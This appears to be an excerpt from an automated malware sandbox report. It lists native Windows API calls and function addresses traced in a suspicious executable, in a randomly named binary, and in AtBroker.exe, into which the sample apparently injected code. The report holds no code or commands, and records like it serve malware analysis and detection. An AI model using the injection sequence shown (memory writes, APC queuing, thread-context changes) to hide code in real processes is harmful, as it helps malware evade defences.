Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01252F30 NtCreateSection,	6_2_01252F30
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01252F60 NtCreateProcessEx,	6_2_01252F60
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01252FA0 NtQuerySection,	6_2_01252FA0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01252FB0 NtResumeThread,	6_2_01252FB0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01252F90 NtProtectVirtualMemory,	6_2_01252F90
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01252FE0 NtCreateFile,	6_2_01252FE0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01252E30 NtWriteVirtualMemory,	6_2_01252E30
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01252EA0 NtAdjustPrivilegesToken,	6_2_01252EA0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01252E80 NtReadVirtualMemory,	6_2_01252E80
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01252EE0 NtQueueApcThread,	6_2_01252EE0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01253010 NtOpenDirectoryObject,	6_2_01253010
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01253090 NtSetValueKey,	6_2_01253090
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012539B0 NtGetContextThread,	6_2_012539B0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01253D10 NtOpenProcessToken,	6_2_01253D10
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01253D70 NtOpenThread,	6_2_01253D70
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_045C4650 NtSuspendThread,LdrInitializeThunk,	10_2_045C4650
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_045C4340 NtSetContextThread,LdrInitializeThunk,	10_2_045C4340
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_045C2C70 NtFreeVirtualMemory,LdrInitializeThunk,	10_2_045C2C70
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_045C2C60 NtCreateKey,LdrInitializeThunk,	10_2_045C2C60
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_045C2CA0 NtQueryInformationToken,LdrInitializeThunk,	10_2_045C2CA0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_045C2D10 NtMapViewOfSection,LdrInitializeThunk,	10_2_045C2D10
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_045C2D30 NtUnmapViewOfSection,LdrInitializeThunk,	10_2_045C2D30
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_045C2DD0 NtDelayExecution,LdrInitializeThunk,	10_2_045C2DD0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_045C2DF0 NtQuerySystemInformation,LdrInitializeThunk,	10_2_045C2DF0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_045C2EE0 NtQueueApcThread,LdrInitializeThunk,	10_2_045C2EE0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_045C2E80 NtReadVirtualMemory,LdrInitializeThunk,	10_2_045C2E80
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_045C2F30 NtCreateSection,LdrInitializeThunk,	10_2_045C2F30
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_045C2FE0 NtCreateFile,LdrInitializeThunk,	10_2_045C2FE0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_045C2FB0 NtResumeThread,LdrInitializeThunk,	10_2_045C2FB0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_045C2AD0 NtReadFile,LdrInitializeThunk,	10_2_045C2AD0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_045C2AF0 NtWriteFile,LdrInitializeThunk,	10_2_045C2AF0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_045C2B60 NtClose,LdrInitializeThunk,	10_2_045C2B60
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_045C2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	10_2_045C2BF0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_045C2BE0 NtQueryValueKey,LdrInitializeThunk,	10_2_045C2BE0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_045C2BA0 NtEnumerateValueKey,LdrInitializeThunk,	10_2_045C2BA0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_045C35C0 NtCreateMutant,LdrInitializeThunk,	10_2_045C35C0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_045C39B0 NtGetContextThread,LdrInitializeThunk,	10_2_045C39B0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_045C2C00 NtQueryInformationProcess,	10_2_045C2C00
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_045C2CC0 NtQueryVirtualMemory,	10_2_045C2CC0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_045C2CF0 NtOpenProcess,	10_2_045C2CF0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_045C2D00 NtSetInformationFile,	10_2_045C2D00
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_045C2DB0 NtEnumerateKey,	10_2_045C2DB0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_045C2E30 NtWriteVirtualMemory,	10_2_045C2E30
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_045C2EA0 NtAdjustPrivilegesToken,	10_2_045C2EA0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_045C2F60 NtCreateProcessEx,	10_2_045C2F60
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_045C2F90 NtProtectVirtualMemory,	10_2_045C2F90
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_045C2FA0 NtQuerySection,	10_2_045C2FA0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_045C2AB0 NtWaitForSingleObject,	10_2_045C2AB0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_045C2B80 NtQueryInformationFile,	10_2_045C2B80
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_045C3010 NtOpenDirectoryObject,	10_2_045C3010
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_045C3090 NtSetValueKey,	10_2_045C3090
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_045C3D70 NtOpenThread,	10_2_045C3D70
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_045C3D10 NtOpenProcessToken,	10_2_045C3D10
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_004D92C0 NtCreateFile,	10_2_004D92C0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_004D9430 NtReadFile,	10_2_004D9430
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_004D9520 NtDeleteFile,	10_2_004D9520
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_004D95C0 NtClose,	10_2_004D95C0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_004D9730 NtAllocateVirtualMemory,	10_2_004D9730
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_043EF8A3 NtClose,	10_2_043EF8A3

Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 0_2_0689C638	0_2_0689C638
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 0_2_0689B728	0_2_0689B728
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 0_2_0689A508	0_2_0689A508
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 0_2_06892E78	0_2_06892E78
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 0_2_0689AD28	0_2_0689AD28
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 0_2_06899619	0_2_06899619
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 0_2_06899628	0_2_06899628
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 0_2_0689C632	0_2_0689C632
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 0_2_0689B718	0_2_0689B718
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 0_2_0689D760	0_2_0689D760
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 0_2_0689D770	0_2_0689D770
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 0_2_0689A4F7	0_2_0689A4F7
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 0_2_068945A1	0_2_068945A1
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 0_2_0689E5BF	0_2_0689E5BF
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 0_2_0689E5C0	0_2_0689E5C0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 0_2_0689EDD0	0_2_0689EDD0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 0_2_0689EDE0	0_2_0689EDE0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 0_2_0689AD1A	0_2_0689AD1A
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 0_2_0689EB40	0_2_0689EB40
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 0_2_0689EB50	0_2_0689EB50
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 0_2_0689E9E0	0_2_0689E9E0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 0_2_06B03198	0_2_06B03198
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 0_2_06B04B10	0_2_06B04B10
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 0_2_06B03680	0_2_06B03680
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 0_2_06B03670	0_2_06B03670
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 0_2_06B0D650	0_2_06B0D650
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 0_2_06B03430	0_2_06B03430
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 0_2_06B04430	0_2_06B04430
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 0_2_06B0E438	0_2_06B0E438
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 0_2_06B04420	0_2_06B04420
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 0_2_06B03428	0_2_06B03428
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 0_2_06B0C248	0_2_06B0C248
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 0_2_06B0003C	0_2_06B0003C
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 0_2_06B00040	0_2_06B00040
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 0_2_06B0313A	0_2_06B0313A
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 0_2_06B03118	0_2_06B03118
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 0_2_06B0BE10	0_2_06B0BE10
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 0_2_06B04FF0	0_2_06B04FF0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 0_2_06B04FE1	0_2_06B04FE1
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 0_2_06B0DA88	0_2_06B0DA88
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 0_2_06B04B00	0_2_06B04B00
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 0_2_06B038D0	0_2_06B038D0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 0_2_06B038D8	0_2_06B038D8
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_00418AF3	6_2_00418AF3
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_00401BC0	6_2_00401BC0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0042F143	6_2_0042F143
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_004011C0	6_2_004011C0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0041029B	6_2_0041029B
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_004102A3	6_2_004102A3
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_00403300	6_2_00403300
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_004104C3	6_2_004104C3
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_00416CEE	6_2_00416CEE
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_00416CF3	6_2_00416CF3
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0040E4A3	6_2_0040E4A3
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0040E5EA	6_2_0040E5EA
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0040E5F3	6_2_0040E5F3
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_004026A4	6_2_004026A4
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_004026B0	6_2_004026B0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01210100	6_2_01210100
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012BA118	6_2_012BA118
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012A8158	6_2_012A8158
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012E01AA	6_2_012E01AA
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012D81CC	6_2_012D81CC
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012B2000	6_2_012B2000
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012DA352	6_2_012DA352
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012E03E6	6_2_012E03E6
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0122E3F0	6_2_0122E3F0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012C0274	6_2_012C0274
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012A02C0	6_2_012A02C0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01220535	6_2_01220535
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012E0591	6_2_012E0591
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012D2446	6_2_012D2446
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012CE4F6	6_2_012CE4F6
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01220770	6_2_01220770
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01244750	6_2_01244750
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0121C7C0	6_2_0121C7C0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0123C6E0	6_2_0123C6E0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01236962	6_2_01236962
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012229A0	6_2_012229A0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012EA9A6	6_2_012EA9A6
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01222840	6_2_01222840
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0122A840	6_2_0122A840
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012068B8	6_2_012068B8
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0124E8F0	6_2_0124E8F0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012DAB40	6_2_012DAB40
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012D6BD7	6_2_012D6BD7
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0121EA80	6_2_0121EA80
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0122AD00	6_2_0122AD00
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01238DBF	6_2_01238DBF
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0121ADE0	6_2_0121ADE0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01220C00	6_2_01220C00
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012C0CB5	6_2_012C0CB5
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01210CF2	6_2_01210CF2
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01262F28	6_2_01262F28
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01240F30	6_2_01240F30
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01294F40	6_2_01294F40
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0129EFA0	6_2_0129EFA0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0122CFE0	6_2_0122CFE0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01212FC8	6_2_01212FC8
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012DEE26	6_2_012DEE26
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01220E59	6_2_01220E59
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01232E90	6_2_01232E90
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012DCE93	6_2_012DCE93
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012DEEDB	6_2_012DEEDB
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012EB16B	6_2_012EB16B
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0125516C	6_2_0125516C
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0120F172	6_2_0120F172
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0122B1B0	6_2_0122B1B0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012D70E9	6_2_012D70E9
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012DF0E0	6_2_012DF0E0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012CF0CC	6_2_012CF0CC
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012270C0	6_2_012270C0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012D132D	6_2_012D132D
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0120D34C	6_2_0120D34C
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0126739A	6_2_0126739A
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012252A0	6_2_012252A0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012C12ED	6_2_012C12ED
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0123B2C0	6_2_0123B2C0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012D7571	6_2_012D7571
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012BD5B0	6_2_012BD5B0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012DF43F	6_2_012DF43F
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01211460	6_2_01211460
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012DF7B0	6_2_012DF7B0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012D16CC	6_2_012D16CC
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012B5910	6_2_012B5910
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01229950	6_2_01229950
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0123B950	6_2_0123B950
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0128D800	6_2_0128D800
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012238E0	6_2_012238E0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012DFB76	6_2_012DFB76
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0123FB80	6_2_0123FB80
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01295BF0	6_2_01295BF0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0125DBF9	6_2_0125DBF9
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01293A6C	6_2_01293A6C
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012DFA49	6_2_012DFA49
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012D7A46	6_2_012D7A46
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01265AA0	6_2_01265AA0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012BDAAC	6_2_012BDAAC
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012CDAC6	6_2_012CDAC6
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012D7D73	6_2_012D7D73
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01223D40	6_2_01223D40
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012D1D5A	6_2_012D1D5A
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0123FDC0	6_2_0123FDC0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01299C32	6_2_01299C32
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012DFCF2	6_2_012DFCF2
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012DFF09	6_2_012DFF09
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012DFFB1	6_2_012DFFB1
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01221F92	6_2_01221F92
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01229EB0	6_2_01229EB0
Source: C:\Program Files (x86)\WwenbeCbxfNhfaTvmXFIirakbCikiCPmwlEKYZHttRIRYqOGnPavAODOTPINSNK\iKfhbNmgVEQKZlbl.exe	Code function: 9_2_03D4339C	9_2_03D4339C
Source: C:\Program Files (x86)\WwenbeCbxfNhfaTvmXFIirakbCikiCPmwlEKYZHttRIRYqOGnPavAODOTPINSNK\iKfhbNmgVEQKZlbl.exe	Code function: 9_2_03D3AB44	9_2_03D3AB44
Source: C:\Program Files (x86)\WwenbeCbxfNhfaTvmXFIirakbCikiCPmwlEKYZHttRIRYqOGnPavAODOTPINSNK\iKfhbNmgVEQKZlbl.exe	Code function: 9_2_03D3AB4C	9_2_03D3AB4C
Source: C:\Program Files (x86)\WwenbeCbxfNhfaTvmXFIirakbCikiCPmwlEKYZHttRIRYqOGnPavAODOTPINSNK\iKfhbNmgVEQKZlbl.exe	Code function: 9_2_03D599EC	9_2_03D599EC
Source: C:\Program Files (x86)\WwenbeCbxfNhfaTvmXFIirakbCikiCPmwlEKYZHttRIRYqOGnPavAODOTPINSNK\iKfhbNmgVEQKZlbl.exe	Code function: 9_2_03D38E93	9_2_03D38E93
Source: C:\Program Files (x86)\WwenbeCbxfNhfaTvmXFIirakbCikiCPmwlEKYZHttRIRYqOGnPavAODOTPINSNK\iKfhbNmgVEQKZlbl.exe	Code function: 9_2_03D38E9C	9_2_03D38E9C
Source: C:\Program Files (x86)\WwenbeCbxfNhfaTvmXFIirakbCikiCPmwlEKYZHttRIRYqOGnPavAODOTPINSNK\iKfhbNmgVEQKZlbl.exe	Code function: 9_2_03D41597	9_2_03D41597
Source: C:\Program Files (x86)\WwenbeCbxfNhfaTvmXFIirakbCikiCPmwlEKYZHttRIRYqOGnPavAODOTPINSNK\iKfhbNmgVEQKZlbl.exe	Code function: 9_2_03D4159C	9_2_03D4159C
Source: C:\Program Files (x86)\WwenbeCbxfNhfaTvmXFIirakbCikiCPmwlEKYZHttRIRYqOGnPavAODOTPINSNK\iKfhbNmgVEQKZlbl.exe	Code function: 9_2_03D38D4C	9_2_03D38D4C
Source: C:\Program Files (x86)\WwenbeCbxfNhfaTvmXFIirakbCikiCPmwlEKYZHttRIRYqOGnPavAODOTPINSNK\iKfhbNmgVEQKZlbl.exe	Code function: 9_2_03D3AD6C	9_2_03D3AD6C
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_04642446	10_2_04642446
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_04634420	10_2_04634420
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_0463E4F6	10_2_0463E4F6
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_04590535	10_2_04590535
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_04650591	10_2_04650591
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_045AC6E0	10_2_045AC6E0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_045B4750	10_2_045B4750
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_04590770	10_2_04590770
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_0458C7C0	10_2_0458C7C0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_04622000	10_2_04622000
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_04618158	10_2_04618158
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_04580100	10_2_04580100
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_0462A118	10_2_0462A118
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_046481CC	10_2_046481CC
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_046441A2	10_2_046441A2
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_046501AA	10_2_046501AA
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_04630274	10_2_04630274
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_046102C0	10_2_046102C0
